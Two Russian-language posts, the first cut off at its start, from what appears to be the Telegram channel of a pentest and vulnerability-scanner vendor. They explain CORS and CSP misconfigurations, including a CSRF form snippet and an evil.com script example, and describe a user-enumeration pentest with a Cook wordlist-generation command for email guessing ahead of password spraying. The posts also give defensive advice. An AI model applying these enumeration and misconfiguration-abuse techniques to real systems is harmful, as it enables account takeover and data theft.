– Проводить CSRF-атаки: <form action="https://api.example/transfer" method="POST">;
– Эксплуатировать Blind SSRF через анализ времени отклика;
– Вызывать API с целевого ресурса через iframe или fetch-запрос без чтения ответа.

2. CORS — управляемое ослабление SOP через заголовки Access-Control-Allow-*, в которым один сайт разрешает другому читать свои данные.
👉 Пример: api.site.com добавляет заголовок Access-Control-Allow-Origin: https://myapp.com — и теперь только myapp.com может получать данные.

Если сервер доверяет присланному Origin или содержит * в конфигурации, то fetch-запрос, направленный с любого домена, может быть использован для получения данных.

Пример опасной конфигурации:
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true


Таким образом браузер начинает отдавать данные сторонним скриптам. Если эндпоинт использует cookie-based аутентификацию, злоумышленник с другого сайта может читать ответы через fetch-запросы и получить чувствительные данные.


3. CSP — Content-Security-Policy ограничивает источники контента и выполнения скриптов, запрещая браузеру выполнять посторонний код (например, при XSS-атаке).
👉 Пример: даже если злоумышленник вставит <script src="evil.com/hack.js">, браузер откажется его загружать. если домен не в white list.

Политика CSP не блокирует доступ к данным, но уменьшает риск эксплуатации клиентских уязвимостей и эксфильтрации данных через fetch-запросы или веб-сокеты.
Однако, если в CSP прописано unsafe-inline или * (всё разрешено) — защита становится бесполезной.

Пример слабой политики:
Content-Security-Policy: default-src *; script-src 'unsafe-inline' https://cdn.example.com

Скрипты с внешних доменов могут выполняться, inline-скрипты остаются уязвимыми, а данные могут уходить на произвольные эндпоинты.

Metascan умеет выявлять мисконфигурации в политиках, а наши инженеры Red Team регулярно демонстрируют клиентам, почему reflected origin в конфигурации CORS — это действительно риск для безопасности.

#Metascan #pentest #redteam #Metascan_news
👍 7
💯 3
2
3 429
M
METASCAN News & PoC
@metascan_news
31.03.2026 08:34
🚰 Перечисление пользователей (user enumeration) — возможность определить путём подбора логинов зарегистрирован ли конкретный пользователь в системе. Эта скрытая уязвимость часто остаётся незамеченной, так как не выглядит опасной на первый взгляд. Но именно она может стать для злоумышленника ключом к проникновению в инфраструктуру.

Применить перечисление пользователей можно используя стандартные функции сайта:
• Формы входа (аутентификация)
• Восстановление пароля
• Страницы регистрации
• Встроенные службы, например, Autodiscover

Даже если сейчас в системе нет явных утечек данных, это не гарантирует, что злоумышленник не сможет восстановить список пользователей, используя эти функции.

Эксперты Метаскан показательно реализовали несколько необычных векторов атаки на инфраструктуру клиента, используя технику генерации словарей. При этом им не потребовалось ни украденных email-адресов, ни готовых баз паролей.

1. Зная структуру корпоративного email-адреса (например, i_ivanov@example.com), на основе словарей пентестеры составили список возможных вариантов популярных фамилий, имён и их комбинаций.
2. С помощью фаззинга — автоматизированной отправки запросов через уязвимые функции — проверили, какие из сгенерированных адресов действительно существуют.
3. Из словаря объёмом 800 тысяч вариантов выявили более 1500 реальных email-адресов сотрудников.

🥷 Полученный список позволил бы злоумышленнику провести массированный подбор паролей (спрей-атаку), захватить учётные записи и получить удобную точку входа во внутреннюю инфраструктуру.

Для подготовки к подбору используют утилиты, позволяющие генерировать разнообразные словари: пароли, Email-адреса, логины. К примеру, Cook поддерживает разнообразные форматы, динамические функции для дат и другие подобные возможности.

Пример такой команды:
cook -l: firstname_1letter_ru.txt -s: russian_translit_surnames.txt l _ s


И результат генерации:
a_ivanov
a_ivanova
a_kuznetsov
d_ivanov
d_ivanova
...

Перечисление пользователей становится серьёзной угрозой, особенно если в системе отсутствуют другие меры защиты. Этот метод может использоваться в разных сценариях — от сбора информации о сотрудниках до непосредственного захвата учётных записей.

Чтобы предотвратить перечисление пользователей, достаточно соблюдать простые правила:

🔹 Возвращайте нейтральные сообщения: независимо от того, существует пользователь или нет, ответ системы должен быть одинаковым. Например, вместо «пользователь не найден» и «неверный пароль» нужно использовать общее сообщение: «неверный логин или пароль».
🔹 Используйте рейт-лимиты: ограничьте количество попыток ввода с одного IP-адреса или для одной учётной записи — это затруднит автоматизированный перебор.

Внимание к таким, казалось бы, незначительным деталям и грамотная настройка защиты помогают закрыть этот вектор атаки ещё до того, как им попытаются воспользоваться.

#Metascan #pentest #redteam #Metascan_news #user_enumeration
👍 4
🔥 4
🤔 1
2 403
M

METASCAN News & PoC

387
Сканер уязвимостей с экспертным сопровождением: https://metascan.ru
Открыть в Telegram